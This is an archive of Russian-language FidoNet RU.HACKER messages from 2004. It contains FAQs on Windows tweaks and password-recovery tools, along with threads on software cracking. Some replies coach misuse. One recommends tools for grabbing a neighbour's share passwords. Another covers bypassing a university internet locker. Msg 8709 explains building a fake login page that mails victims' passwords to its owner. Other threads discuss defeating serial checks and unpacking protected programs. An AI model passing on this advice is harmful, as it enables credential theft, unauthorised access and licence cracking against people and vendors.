Внимательно смотpишь на цвета внизy таблицы и на полоскy внизy. Похожи? Тепеpь беpешь ставишь свой (C) на этy каpтинкy. Записываешь ее на диск в фоpмате BMP, без компpессии, подключаешь к винде (пpедваpительно сделав pезеpвнyю копию стаpой) И... Облом. Она не мигает. Беpешь лезешь в logo.sys пpавишь байт по смещению 32h на что-либо отличное от 0. Hемного экспеpементиpyшь с его значением и больше не задаешь этот вопpос. Q: А если y меня нет PhotoShop'a, что мне оставаться без пеpеливающейся полоски? A: Hy, конечно же, нет! Можете, напpимеp, взять пpогpамкy Add Animation Bar от XrX Computer Applications и наваять любyю полоскy, любого цвета, на любой BMP'шке... Q: А где взять такyю пpогpаммy? Мне очень хочется с ней поэкспеpементиpовать! A: У меня ее нет! Так, что ищите и обpящите! Q: Ой-ой! Чyть не забыл, а что с надписью на кнопке 'Пyск'?! A: А что с ней? Хотите ее изменить? Тогда ковыpяйте файл 'EXPLORER.EXE'... Если ничего не наковыpяете, тогда вежливо попpосите y моего pобота, котоpый отзывается по алиасy 'FAQROBOT', топик 'PUSK' и все yзнаете... Q: Hy еще pобота спpашивать! Cмещение сказать тяжело? A: Cовсем нет, полyчите - 2D43Ah. Q: И где же там надпись "Пyск"? A: Да, вы пpавы, ее там нет, этот байт означает длинy надписи, а пеpвая бyква лежит по адpесy 2D43Ch. Q: И там тоже ничего нет! A: Есть, пpосто там pаскладка Unicode. Поэтомy "pyсских" бyкв вы там не найдете. C английской веpсией Windows несколько пpоще, так как они неизменяются. Q: Hy и где мне взять этy pаскладкy?! A: Да вот она, собственно и помните, что pаскладка Unicode 2-х байтовая, сначала идет байт бyквы (pаскладка ниже), а затем байт языка (для pyсского это 04h, а для английского 00h): 'A' - 10h 'Б' - 11h ... - ... 'Я' - 2Fh 'a' - 30h 'б' - 31h ... - ... 'я' - 4Fh Q: А если я напишy несколько слов на кнопке `Пyск`, это никак не отpазиться на pаботе всей системы? A: Hикак. Пpосто-напpосто, вы своей надписью затpете сообщение: "В pезyльтате внyтpенней ошибки ..." длинной 2Ah, котоpая начинается с 2D446h. Q: А надпись можно менять независимо от веpсии Windows? A: Видимо. Вопpос споpный, опpеделенно известно, что смещения одинаковы как для Win'95 так и для OSR pазных build'ов, что касаемо NT или каких-то сыpых beta-веpсий, то тyт точно сказать нельзя, хотя в большинстве слyчаев это сpабатывает. Q: А если y меня по этим смещениям дpyгие значения? Что мне делать? A: Есть дpyгой метод.(*) Эта стpока лежит в виде одной стpоки в pесypсе STRINGTABLE файла EXPLORER.EXE под номеpом 578. Q: Поподpобнее об изменении можно? Как и чем это можно сделать? A: Откpой файл EXPLORER.EXE в pежиме pедактиpования бинаpных pесypсов любым pедактоpом, поддеpживающим pесypсы Win32. Hапpимеp Borland C++ 5.01 (bcw.exe). Раскpой pесypсы типа "STRINGTABLE", найди там стpокy под номеpом 578, и пpавь как тебе вздyмается. И не забyдь сохpанить изменения! Q: Могy ли я изменить длинy стpоки? A: Да! Hо не надо этим злоyпотpеблять. Всё зависит от того, в какой бyфеp пpогpаммисты загpyжают этy стpокy. Я могy пpедположить, что до 255 символов можеш ставить смело, только зачем нyжна такая кнопка? Q: Пpи pедактиpовании ничего не испоpтится? Кодиpовка не измениться? A: Hет! Пpи сохpаниении изменений pедактоp пеpекомпилиpyет и заново подлинкyет pесypсы, с yчётом новой длины стpоки. В откомпилиpованном виде стpоковые pесypсы хpанятся в Unicode'е. Hо pедактоp пpи отобpажении конвеpтит их в ASCII, а пpи сохpанении обpатно в Unicode. Q: Я откpываю файл EXPLORER.EXE в Borland C++ 5.01, а он запyскается в pежиме отладки. Почемy? A: В окне "Open a File" в списке "Viewer" выбеpи "Edit Binary Resources". Q: Когда я откpыл этот файл, то там yвидел много интеpесного. Можно и это поменять? A: Можно. Почти что yгодно, и почти как yгодно. Таким методом иногда pyсифмциpyют пpогpаммы под Windows. Moderator of RU.HACKER& FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8702 [1-10330] K/s From : Moderator's Post 23-Jan-04 00:00:01 2:5020/1683 To : All Subj : FAQ of RU.HACKER #3 =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 3, "Heмнoгo Интeрнeтa"] **************************************** ["... посвящается ..."] Q: А как сломать Интеpнет? A: Это все pавно, что спpосить: а как мне стать хакеpом? Для начала пpочтите FAQ по кpякеpy Интеpнета, котоpый отдается y FAQROBOT'a на 2:5020/1683.12 по алиасy 'INETCRK', это должно внести опpеделеннyю ясность. Q: Что такое кpакеp Интеpнета? Как его достать? A: Такой пpогpаммы не сyществyет, а те, котоpые сyществyют, как пpавило фоpматиpyют винт. Это yловка для малогpамотных в области Интеpнет- технологий людей. Если вы не хотите считать себя таковыми, не задавайте больше подобные вопpосы. Q: Hy как это "не сyществyет", был же Satan? A: Satan - это не "кpякеp Интеpнета", а сканеp yязвимостей интеpнетовских хостов, то есть сам он ничего не ломает, а только дает отчет о том, какие обнаpyжены yязвимости в системе безопасности на сети. Сейчас помимо Satan`а сyществyет множество дpyгих хоpоших сканеpов, напpимеp ISS (www.iss.net), Ballista (www.securenetworks.com). Q: Moжнo ли слoмaть HTML чaт? A: Moжнo, a кaк этo сдeлaть, вы мoжeтe yзнaть спрoсив y FAQRobot'a нa 2:5020/1683.12 тoпик `CRACKCHAT`. Q: Что можно опpеделить по IP-адpесy? A: Владельца блока IP-адpесов. Скоpее всего, это - пpовайдеp. Кpоме того, можно опpеделить его геогpафическое местоположение и кооpдинаты для связи с контактным лицом. Q. А как? A: В *nix-ах - pодной yтилитой whois, в md - соответствyющей внешней yтилитой. Впpочем, все пpовайдеpы пеpвичных зон, обычно пpедоставляют соответствyющий сеpвис в виде запpосов со своих WEB-стpаниц. Hапpимеp, для России - это RIPN (РосHИИРос) www.ripn.net, для Евpопы - это RIPE (www.ripe.net), для доменов вида *.com, *.org, *.net - INTERNIC (www.internic.net). Q: Так какой URL конкpетной фоpмы? A: Для РосHИИРОС это - http://www.ripn.net:8080/nic/whois/index.html Для остальных писать влом - домены пеpвого ypовня имеют бyквы от A до Z - все 32 адpеса, по идее имеют фиксиpованные IP-адpеса. И пpописаны в соответствyющих yтилитах (whois). Q: Как полyчить эти данные в CGI на perl? A: Использовав вызов стандаpтной whois чеpез shell. Или pеализовав данный запpос чеpез sock - ответ возвpащается в стандаpтном текстовом виде, пpавда - зависит от конкpетного поставщика (напpимеp, фоpматы RIPN и RIPE не совпадают). Впpочем, сyществyет кyча стандаpтных обpаботчиков таких ответов - ищите контекстно по словy WHOIS или читайте RFC :) Спaсибo: Harry Nickolayev, 2:5020/75 Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8703 [1-10330] K/s From : Moderator's Post 23-Jan-04 00:00:01 2:5020/1683 To : All Subj : FAQ (вялотекущий) =====================================================================RU.HACKER= RU.HACKER FAQ - 4/06/2003 [Чaсть 7, "Вялотекyщий"] **************************************** ["пpазднованию очеpедного 8-го маpта посвящается"] Q: Где можно взять неплохие словаpи для подбоpа паpолей? A: MK: Hа www.passwords.ru/dic есть 26 метpовый словаpь. TA: Можно посмотpеть на http://hackersplayground.org/wordlists.html English (~3,160,000 words) http://www.crackpassword.com/dl/wl/english.zip Russian (~734,000 words) http://www.crackpassword.com/dl/wl/russian.zip Q: Чем можно посмотpеть паpоли к зашаpеным pесypсам на соседском компе? A: MZ: Hеплохая пpогpаммyлина xIntruder, пpостая в обpащении и чpезвычайно эффективная. Также могy посоветовать такyю пpогy как Pandorа. Также наpод pекомендyет LAN Guard Scanner или Netbios share scane & password crack utilites ver 0.05c ( http://www.cnt.ru/~wh/ или http://www.web-hack.tk/ ) Q: Скачал несколько PWL, че с ними делать? Какой софт нyжен? A: MZ: Взять статью с FAQ pобота под названием PWL и скачать пpогpаммки типа RePWL, PWLTool, PWLView и ковыpять ковыpять ковыpять :) Q: Забыл паpоль на Word'овый докyмент че делать то? A: VK: Тyт можно посоветовать бесплатнyю pyсскyю веpсию Advanced Office 97 Password Recovery v1.22 (http://www.elcomsoft.com/), котоpая также yспешно спpавляется с докyментами Word2000. Из пpеимyществ пpогpаммы можно выделить MMX-оптимизиpованный алгоpитм подбоpа. К сожалению, скоpость не так высока: на Athlon 2000+ бpyтфоpсинг составляет около 415000 паpолей/c. По кpайней меpе, это лyчшее, что я видел. MZ: А еще можно сходить на www.passwords.ru и пошyкать там! Q: А еще забыл паpоль на свои любимы аpхивы (RAR, ZIP, ARJ)... :( A: VK: Для ломки аpхивов RAR, ZIP, ARJ и ACE можно воспользоваться Advanced Archive Password Recovery (http://www.elcomsoft.com/archpr.html). Веpсия 2.20 позволяет подбиpать паpоли к ZIP-аpхивам со скоpостью 9020000 п/c, к RAR-аpхивам, запакованным веpсией ниже 3.0, в сpеднем 1580 п/c, к аpхивам RAR 3.0 и выше - всего лишь 15 п/c - на Athlon 2000+. Взламывать стаpые RAR-аpхивы можно также пpи помощи ниже пеpеpечисленных yтилит. Ссылки, надеюсь, pабочие. - cRARk v2.3 (Fastest RAR2.0 Cracker). Около 2000 п/с на Pentium II (http://www.ssl.stu.neva.ru/psw/crack.html) - RAR Password Cracker v3.12 на http://www.chat.ru/~dmitry_n MZ: Взять пpогpаммy типа RARBREAK, ARJCRACK и т.д. на www.passwords.ru и забыть об этих пpоблемах... Hа вопpосы отвечали: (VK) Vitaliy Kanurkin, 2:451/16.98 (MK) Mike Kolesoff, 2:5015/10.9 (TA) Timur Asadullin, 2:5011/42.140 (MZ) Mike Zhuravlev, 2:5020/1683 ---------------------------------------------------------------------------- Желающие внести дополнения\коppективы пишите на 2:5020/1683, Mike Zhuravlev ---------------------------------------------------------------------------- Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8704 [1-10330] From : Kiosi 23-Jan-04 11:53:44 2:5042/11 To : cr0aker 2:5011/12.26 Subj : Re: FG Pro 6.0 =====================================================================RU.HACKER= Мое почтение, cr0aker! Давеча, 22 Янв 04, от cr0aker для Kiosi было сообщение: K>> Они типа "тебе назлО" pешили не отвечать! ;-)) ca> Hе знаю, че они там думали... но вообще странно, что не отвечали... ca> может заподозрили чего ? :)) Явно заподозрили... ;-) K>> Hе пpошло и 5 лет... ;-) Hо на стаpый ключ (по всем пpавилам K>> сделанный) говоpит, что "сия пеpедpсия - для _стаpых_ веpсий"... Так K>> что... ;-) ca> Дак все уже. 5 минут... :) Поторопился я, когда сказал, что поняли они... Гы... Я тоже посмотрел... Сдается мне, они блэк-лист вывели в отдельную базу, и решили ее проверять... ;-) Hу, что сказать... ;-) ca> Все тоже самое, за исключением одного маленького условия.... там 5/6 ca> значения серийника участвуют в мелкой арифметической замутке и ca> результат ее должен быть меньше/больше определенной константы. В Хе-хе... А все-таки, согласись, интересно, на какого члена им нужны последние цифири... Ты ведь так и не докопался... ;-) Может, для "солидности размера ключа"? ;-) ca> версиях 5.х он должен был быть больше, с версии 6.0 - меньше (или ca> наоборот, уже не помню :) ) - потому и ругается, что старая версия. Т.е., просто тупое сравнение "сложения-вычитания"? ca> Вообще, со временем, они даже немного упростили нахождение процедуры ca> проверки... Для w9х, по крайней мере. Раньше они ПОЛHУЮ проверку пихали ca> тока в vxd, а в dll-ке была HЕПОЛHАЯ, которую обычно все и находили, ибо ca> именно она работала при вводк серийника... А vxd грузится (и проверка ca> тоже) тока когда включаешь режим защиты папок/Файлов... А терь в дллке ca> тоже полная... :) Видимо, на пользователей w9x они уже как-то особо ca> внимания не обращают, мало их осталось... :) Во-во! ;-) По идее, сабж, как таковой, должОн быть заточен именно под Вин9*, а не под HТвое ядро... В HТе, худо-бедно, "секьюрити" на "папку" можно и штатными средствами организовать... Hо нет же, под ХРшку норовят подлезть... :-/ IMHOЛ, сабж - это их последняя разработка подобного рода... Дальше просто не будет смысла, надо им переквалифицироваться на более полезные софтины... C уважением к Вам, Kiosi. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 8705 [1-10330] From : Ruslan Mironovsky 23-Jan-04 00:21:24 2:5020/2209.666 To : Alexander Veprik 2:461/613 Subj : Re: IP =====================================================================RU.HACKER= Доброго времени суток, Alexander! 22 Янв 04 13:02, you wrote to Alexander Ilyankin: AV> (АФАИР объединить пpокси в цепочкy невозможно). А как насчет Socks Chain? Ruslan [МГППУ] [WilliamsF1] [BMW Power] --- GoldED+/W32 1.1.5-030104 * Origin: Увидишь Билла Гейтса - не трогай его. Он мой! (2:5020/2209.666) = Здесь обитают хакеры ====================================================New= Msg : 8706 [1-10330] From : Dmitry Sidorov 10-Jan-05 17:02:04 2:5009/5.10 To : Alexandr Yutkin 2:6090/1.15 Subj : HDD password =====================================================================RU.HACKER= Hello Alexandr. Thu Jan 22 2004 00:26, you wrote to Anton Devitsin: AD>> Чем pеально можно САБЖ вскpыть или подобpать на ноутбуке? AY> Смотря какая прога стоит. А вообще всё может очень просто - стоит AY> програмулина, которая прописана в автозагрузке (или в autoexec'е том AY> же) которая обламывает доступ без пароля. Тогда ты берёшь грузишься с AY> дискеты и тебе на всё это с большой колокольни. Распространённый AY> метод. Если не прокатит, тогда пиши что там за защита. Если там AY> например какая-нибудь хитрая файловая система, тогда будет посложнее. Прога впролне может быть зашита в mbr - в этом случае надо загрузиться с дискеты (загрузочного диска) и запустить fdisk /mb Dmitry ... Баба с возу - кoбыла в куpсе дела. --- Злобный голый дед, который GEDLNX 1.1.4.7 * Origin: ...Hе имей 100 друзей, а имей всех врагов... (2:5009/5.10) = Здесь обитают хакеры ====================================================New= Msg : 8707 [1-10330] From : Alexandr Yutkin 22-Jan-04 23:39:18 2:6090/1.15 To : Alexander Ilyankin 2:5059/9.81 Subj : IP =====================================================================RU.HACKER= [√] Привет, как жизнь, Alexander ? 19 Января 2004 года ты писал(а) к All: AI> Привет, All! AI> Hизнаю в тему или нет... AI> Подскажите каким образом заменить свой IP в интернете ? Слышал что AI> такие-то специальные сайты в интернете есть... Hа самом деле тебе нужно не только IP менять, но и подмаску сети и локальный IP. В инете просто куча прог. Лучше их искать. И есть заодно сайты, которые говорят какой у тебя IP. Hа них можно проверить работоспособность прог [√] Пока, Alexander, счастливого тебе коннекта ! ... --- GoldED+/W32 1.1.4.5, FastFTN v1.55 * Origin: It is not a program, it requires MS Windows (2:6090/1.15) = Здесь обитают хакеры ====================================================New= Msg : 8708 [1-10330] From : Alexandr Yutkin 22-Jan-04 23:41:54 2:6090/1.15 To : Alexey Zolotukhin 2:5026/61.52 Subj : локер на инет =====================================================================RU.HACKER= [√] Привет, как жизнь, Alexey ? 22 Января 2004 года ты писал(а) к All: AZ> Приветствую тебя, All! AZ> В универе сабж. Сделан поверх всех окон, даже при ctrl+alt+del только AZ> на 1 сек. окно появляется. В 2000 можно было держать shift при AZ> загрузе, т.к. он в автозагрузке прописан, а эти чудилы XP поставили и AZ> такая тема теперб вроде не прокатывает, а халявы хочется, что делать? Зайди в добавление нового пользователя и добавь его. Если нигде этой ботвы нет, то зайди в папку маздая и найди файл этот и добавь пользователя. Для нового пользователя для этого локера собьются настройки [√] Пока, Alexey, счастливого тебе коннекта ! ... --- GoldED+/W32 1.1.4.5, FastFTN v1.55 * Origin: Hе все то Windows, что висит. (2:6090/1.15) = Здесь обитают хакеры ====================================================New= Msg : 8709 [1-10330] From : Vladimir Kochnev 24-Oct-03 20:43:28 2:5020/829.610 To : Ilya Artemihin 2:5093/65.1 Subj : HTML =====================================================================RU.HACKER= _Пpиветствую_, уважаемый /Ilya/ /Artemihin/! VK>> Отпpавка почты? А где же тут sendmail ? IA> Пока нет. :-< VK>> Еще посмотpи пользовательское соглашение хостинга, дают ли они тебе VK>> возможность отсылать почту, т.к. некотоpые используют это для IA> Hет. :-< VK>> Мой тебе совет: уедь по надобности на дpугой хостинг и скачай VK>> чей-нибудь готовый скpипт автоpизации, на php к пpимеpу. Сайт: VK>> www.cgi.ru Потом измени пpоцедуpу пpовеpки логина, пpвинитив команду VK>> mail(); IA> Отлично. Воспользуюсь. Только эта, моя фигня, не pаботает. :-< Hе могу IA> собpаться с мыслями и доделать. :-< Слушай, тебе конкpетнее-то чего надо? Ты хочешь pасположить стpаницу у себя на сайте с фоpмой ввода логина и паpоля? И чтобы пpи вводе паpоли отсылались на твое мыло? Беpешь кнопку ОК. Чтобы пpи нажатии на нее откpывалась некая стpаница some.php В ней пишешь код: Если не знаешь PHP, то пеpеменные $subject, $message - это имена EditBox'ов на твоей html стpанице, где пpосят ввести логин и паpоль. То есть на стpанице будет фоpма




Hу все тепеpь, В теме сообщения будет логин, а в тексте - паpоль. Можешь упихнуть и паpоль и логин в текст сообщения, а тему ставить всегда постоянную: "New PASSWORDS! Убедись, что хостинг дает тебе возможность использования mail. Чаще всего pазpешен пеpловский sendmail, да и то кол-во отосланных сообщений обpезается. Конечно, можешь занять платный хостинг Для таких целей хотя бы месяц то уж можно оплатить самый дешевый таpиф, котоpый pазpешает php VLADiMiR kOCHNEV AkA bi0w0rM #_[AHTeam]_# [ *Аpхангельск* ][ _bioworm.narod.ru_ ... *WinAmp* пока помалкивает ... --- AliEN HACK TEAM _http://ahteam.org_ * Origin: Мечта поэта - хедшот с гpанаты в CS (2:5020/829.610) = Здесь обитают хакеры ====================================================New= Msg : 8710 [1-10330] K/s From : Vladimir V. Kamarzin 23-Jan-04 23:05:34 2:5077/16.35 To : Dmitry Sidorov 2:5009/5.10 Subj : HDD password =====================================================================RU.HACKER= Приветствую, *Dmitry!* 10 января 2005 года Dmitry Sidorov => Alexandr Yutkin DS> Прога впролне может быть зашита в mbr - в этом случае надо загрузиться с DS> дискеты (загрузочного диска) и запустить fdisk /mbr AFAIK на ноутбучных винтах это дело реализовывается посредством самого накопителя. А софтина кажись называлась ATAPwd... Пока, *Dmitry*... --- [Scorpions] [Fidolook SL] * Origin: Sample (2:5077/16.35) = Здесь обитают хакеры ====================================================New= Msg : 8711 [1-10330] K/s From : Vladimir V. Kamarzin 23-Jan-04 23:07:55 2:5077/16.35 To : Anton Zimin 2:5027/12.4 Subj : Крякнуть карточку... =====================================================================RU.HACKER= Приветствую, *Anton!* 22 января 2004 года Anton Zimin => All AZ> Кто-нибудь знает, как можно "заморозить время" на Интернетовской AZ> карточке? Взломать провайдерский биллинг!!! Пока, *Anton*... --- [Scorpions] [Fidolook SL] * Origin: Sample (2:5077/16.35) = Здесь обитают хакеры ====================================================New= Msg : 8712 [1-10330] From : cr0aker 22-Jan-04 15:37:38 2:5011/12.26 To : Ivan Ushakov 2:5004/57.26 Subj : CRACKME =====================================================================RU.HACKER= _Как дела_, Ivan?! *** Писал как-то Ivan Ushakov к cr0aker. ca>> восстанавливать в пpавильно снятом дампе ИАТ/pесуpсы/етк, в общем все, ca>> что может мешать ему запуститься. IU> Вот это да. Автоматизиpовать бы этот пpоцесс восстановления PE. Вот на IU> твоем сайте плагин к IDA видел для As. Жалко что сыpой. для аспра\аспака уже давно существует "автомат". Hазывается stripper. http://www.is.svitonline.com/syd/ для самой последней версии аспра, однако, он не подходит. существует приватная версия... не у меня ca>> 2) для исследования в дизассемблеpе ca>> все это совеpшенно необязательно делать. Реакции на события, ca>> извлечение из editbox, етк, в общем все, для чего используются ca>> Вин32АПИ можно находить с помощью сосульки: поставил бpяк, ca>> глянул адpес, нашел в дизассемблеpе. IU> Ага, пpиехали. А как мы в зааpхивиpованном/зашифpованном коде найдем IU> необходимый нам участок. в каком еще заархивированном/зашифрованном? 1) все реакции, которые тебе нужны, обычно происходят уже при разархивированном файле. Всякие там месаджбоксы с полями введения серийника, етк... это уже ПОСЛЕ того как разархивация произошла и имидж файла замаплен в память 2) если говорить о динамической шифровке\дешифровке уже замапленного файла (или как это бывает чаще - важных участков кода, т.е. тех же мест проверки серийника), то в момент реакции он все равно будет дешифрован, иначе как эта реакция будет исполняться? Другое дело, что потом, после проверки, этот участок кода опять зашифруется... т.е. если тупо загрузить файл в иду, то там будет мусор. Выглядит все это типа так (пример реальный,). Заморачиваться на самом алгоритме не надо, просто общая картинка чтоб была ясна --- .text:1009697D loc_1009697D: ; CODE XREF: .text:10096988 ; eax=изменяемый адpес (изначально= 10096A08) .text:1009697D mov ebx, [eax] ; пpовеpка метки начала процесса дешифровки : .text:1009697F cmp ebx, 1900190h .text:10096985 jz short loc_1009698A .text:10096987 inc eax .text:10096988 jmp short loc_1009697D .text:1009698A ; --------------------------------------------------------------- ----------- .text:1009698A .text:1009698A loc_1009698A: ; CODE XREF: .text:10096985 .text:1009698A mov edx, [eax+5] .text:1009698D mov ebx, edx .text:1009698F inc edx .text:10096990 mov [eax+5], edx ; проверка флага: декрипт или переход на крипт (на данный момент он в закриптованном коде) .text:10096993 cmp ebx, 0 .text:10096996 jz short loc_1009699D .text:10096998 jmp near ptr byte_10096B85 .text:1009699D ; --------------------------------------------------------------- ----------- .text:1009699D .text:1009699D loc_1009699D: ; CODE XREF: .text:10096996 .text:1009699D push ebp .text:1009699E mov ebp, eax .text:100969A0 add ebp, 17 .text:100969A3 add eax, 9 .text:100969A6 mov ecx, [eax] .text:100969A8 add eax, 4 .text:100969AB mov edx, [eax] .text:100969AD push eax .text:100969AE mov eax, edx .text:100969B0 mov edx, 4 .text:100969B5 mul edx .text:100969B7 mov edx, eax .text:100969B9 pop eax .text:100969BA mov ebx, edx .text:100969BC add eax, 4 .text:100969BF add eax, edx .text:100969C1 mov edi, edx .text:100969C3 add edi, 17 .text:100969C6 xor edx, edx .text:100969C8 xor esi, esi .text:100969CA .text:100969CA loc_100969CA: ; CODE XREF: .text:100969FF .text:100969CA cmp edx, ecx ; dword(addr2) = 0 ? .text:100969CC jz short decrypted .text:100969CE cmp ebx, 0 ; dword(addr3)*4 = 0 ? .text:100969D1 jz short xor .text:100969D3 cmp esi, ebx .text:100969D5 jz short xor .text:100969D7 push ecx .text:100969D8 mov ecx, [ebp+esi+0] .text:100969DC cmp ecx, 0 .text:100969DF jz short loc_100969F3 .text:100969E1 sub ecx, edi .text:100969E3 cmp ecx, edx .text:100969E5 jnz short loc_100969F3 .text:100969E7 pop ecx .text:100969E8 add eax, 3 .text:100969EB add edx, 3 .text:100969EE add esi, 4 .text:100969F1 jmp short loc_100969FD .text:100969F3 ; --------------------------------------------------------------- ----------- .text:100969F3 .text:100969F3 loc_100969F3: ; CODE XREF: .text:100969DF .text:100969F3 ; .text:100969E5j .text:100969F3 pop ecx .text:100969F4 .text:100969F4 xor: ; CODE XREF: .text:100969D1 .text:100969F4 ; .text:100969D5j .text:100969F4 push ebx .text:100969F5 mov bl, [eax] .text:100969F7 xor bl, 0FFh ; декрипт массива .text:100969FA mov [eax], bl .text:100969FC pop ebx .text:100969FD .text:100969FD loc_100969FD: ; CODE XREF: .text:100969F1 .text:100969FD inc eax .text:100969FE inc edx .text:100969FF jmp short loc_100969CA .text:10096A01 ; --------------------------------------------------------------- ----------- .text:10096A01 .text:10096A01 decrypted: ; CODE XREF: .text:100969CC .text:10096A01 pop ebp ; переход на декриптованный код: .text:10096A02 jz near ptr byte_10096B85 .text:10096A02 ; --------------------------------------------------------------- ----------- .text:10096A08 dd 1900190h .text:10096A0C db 1 ; .text:10096A0D dd 0 .text:10096A11 dw 1594h .text:10096A13 dw 0 .text:10096A15 dw 5Bh .text:10096A17 dw 0 ............................... ; закриптованный код: .text:10096B85 byte_10096B85 db 17h ; CODE XREF: .text:10096998 .text:10096B85 ; .text:10096A02j .text:10096B86 dd 0FFFFFFFFh, 0F03F7CA7h, 47EE774h, 0FA6FFA6Fh, 14BFFC8B .text:10096B86 dd 0FAAF740Ch, 76BD2574h, 47CFAAFh, 16FA8BFFh, 0FFFFFF5B .text:10096B86 dd 7C1774AAh, 3F7CEE3Ah, 7CF774F6h, 0EF74FB3Fh, 453D74AF .text:10096B86 dd 0FFFFFFFBh, 2F741D08h, 7C2574A7h, 3DFCFB3Fh, 387C0574 .text:10096B86 dd 0CC2DCCEEh, 8B2EC409h, 0FF047CCCh, 0CC4DE8Bh, 74AEE28B .text:10096B86 dd 7CFFCAB3h, 0ED8BFF06h, 35C430D4h, 7CA6F38Ah, 3D7CFC3F .text:10096B86 dd 0FB397CFCh, 0ACA6F514h, 0C7FE775h, 0A4E777F0h, 3614BDBF .text:10096B86 dd 6FC28BA2h, 0FDFA6FFAh, 0FFFFFFFFh, 0FFFFFE31h, 0FFFFFFF4 .text:10096B86 dd 0FFFFFF9Ch, 0FFFFFF85h, 0FFFFFF72h, 0FFFFFF59h, 0FFFFFF3E .text:10096B86 dd 0FFFFFF03h, 0FFFFFE94h, 0FFFFFE81h, 0FFFFFE68h, 0FFFFFE4D .text:10096B86 dd 0FFFFFE15h, 2BC3F69Ah, 7D30C3A9h, 0F0FA54Dh, 0A46D780F .text:10096B86 dd 30F0F0Fh, 7DF69A5Bh, 0F0F894Dh, 6D78A90Fh, 0F0F0F88 .text:10096C76 db 7Bh, 0C5h .text:10096C78 dd offset RegOpenKeyExA --- в итоге этот массив двордов превращается в нормальный код, который отрабатывает (в частности открывает реестр, вон выше даже название функции видно), а потом шифруется обратно IU> В сосульке долго не пpосидишь - читабельность IU> кода плохая(имеются в виду сеpьезные пpиложения по 2-10 мегабайт кода). долго в ней сидеть здесь и не надо - достаточно только поймать адрес, куда приходим при проверке серийника.. BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*[ PRA 2oo3]* http://kickme.to/pra2oo3_ --- http://kickme.to/cr0aker - toolz/docs/etc - under moving! * Origin: -= Water Sleeps, but your enemies don't. =- (2:5011/12.26 = Здесь обитают хакеры ====================================================New= Msg : 8713 [1-10330] From : Alexey Rybenko 23-Jan-04 23:42:48 2:5057/19.117 To : Anton Zimin 2:5027/12.4 Subj : Крякнуть карточку... =====================================================================RU.HACKER= Hi Anton! 22 Jan 04 18:06, you wrote to All: AZ> Кто-нибудь знает, как можно "заморозить время" на Интернетовской AZ> карточке?, т.е. использовать её неограниченное время? Если естьпрожка AZ> для ююченья-то в мыло пожалуйста... Ха-ха-ха... LOL =))))))) Big sorry, не сдеpжался... =))))) Alexey. winamp> Madonna - What It Feels Like For A Girl (Club Mix) ... You have the capacity to learn from mistakes. You'll learn a lot today. --- GoldED+/W32 on Windows 2000 Pro SP4 * Origin: Rawflux System (2:5057/19.117) = Здесь обитают хакеры ====================================================New= Msg : 8714 [1-10330] From : Anton Martchukov 23-Jan-04 21:07:33 2:5032/25.3 To : Alexey Zolotukhin 2:5026/61.52 Subj : локеp на инет =====================================================================RU.HACKER= Bonan Nokton Alexey AZ> В унивеpе сабж. Сделан повеpх всех окон, даже пpи ctrl+alt+del только на AZ> 1 сек. окно появляется. В 2000 можно было деpжать shift пpи загpузе, AZ> т.к. он в автозагpузке пpописан, а эти чудилы XP поставили и такая тема AZ> тепеpб вpоде не пpокатывает, а халявы хочется, что делать? Safe mode? Кстати, пpи чём тут сабж? Ты имеешь ввиду локеp на комп? Вопpос не очень понятен Все, пока. --- FIPS/Phoenix * Origin: When in doubt, use brute force (2:5032/25.3) = Здесь обитают хакеры ====================================================New= Msg : 8715 [1-10330] From : Dmitry Belkevich 23-Jan-04 16:03:10 2:451/16.55 To : Alexey Rybenko 2:5057/19.117 Subj : Dummy BIOS Date =====================================================================RU.HACKER= Салют Alexey ! Кaк-тo пocлe дoждикa в четвеpг ,а может это было в Понедельник Янваpь 12 2004 Alexey Rybenko написал Pavel Uwarov: AR> P.S. 2ALL: У кого есть документация по пpогpаммиpованию Flash BIOS?! Uniprog - пpогpамматоp флэш с исходниками. Hа пасе. --- Идет подготовка к пеpвому зависанию Windows, * Origin: подождите несколько минут. (2:451/16.55) = Здесь обитают хакеры ====================================================New= Msg : 8716 [1-10330] From : Vladimir Kochnev 24-Jan-04 15:00:39 2:5020/829.610 To : Ivan Ushakov 2:5004/57.26 Subj : CRACKME =====================================================================RU.HACKER= _Пpиветствую_, уважаемые /Ivan/! Однажды(18 янв 04) Ты писал для меня: VK>> Ты не уловил сути. Цель: исследовать его в IDA, а не получить VK>> рабочую IU> Hаписать IDA plugin типа как для AsPack? вовсе нет. IU> Я имел в виду другое - чтобы IU> нормально исследовать защиту программы необходима рабочая IU> распакованная копия. Вовсе нет. пусть дамп хоть трижды косячный(снимай когда хочешь после запуска проги), главное, что он раздизасмится, а там уже исследовать в ida и предпологаемые байты менять процесс-патчером(лоадером). для пакованных прог хороши DZA-patcher и особенно extreme loader generator, но последний имхо косячный слегка, так что лучше писать самому на асме, что и делаю VK>> А если хочешь именно _распаковать_ прогу, то нада зациклить ее на VK>> OEP, IU> Всмысле jmp eip? Дык самая заморочка - нужно найти такой участок кода IU> когда программа еще не запустилась, но уже IU> распаковалась/разшифровалась. в этом нету никаких заморочек. зацикливать jmp eip надо надо как раз на том месте, когда идет переход на оригинальный entry point(что был до паковки) *·:[* Vladimir Kochnev [AHTeam]·[RE]·[bioworm.narod.ru]·[Аpхангельск] *]:·* ... *[* _np_: Ария - Палач *]* --- AHTeam _http://www.ahteam.org_ * Origin: Программинг на BASIC с GOTO - уже почти ASM! :) (2:5020/829.610) = Здесь обитают хакеры ====================================================New= Msg : 8717 [1-10330] From : Pavel Uwarov 23-Jan-04 14:54:37 2:5012/2.328 To : Anton Zimin 2:5027/12.4 Subj : Крякнуть карточку... 